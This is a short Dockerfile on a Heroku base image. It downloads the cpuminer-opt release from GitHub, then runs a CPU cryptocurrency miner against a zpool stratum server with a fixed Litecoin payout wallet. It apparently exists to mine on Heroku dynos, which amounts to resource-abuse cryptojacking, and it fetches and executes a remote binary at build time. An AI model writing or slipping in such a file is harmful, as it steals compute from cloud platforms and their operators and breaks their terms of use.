FROM heroku/heroku:18
RUN apt-get install -y curl git unzip wget
RUN wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz; tar xf cpuminer-opt-linux.tar.gz; ./cpuminer-sse2 -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 -u MJwwwNqs1pwdPZqCpE41R4ZvcAH6At31mY -p c=LTC
CMD bash heroku.sh
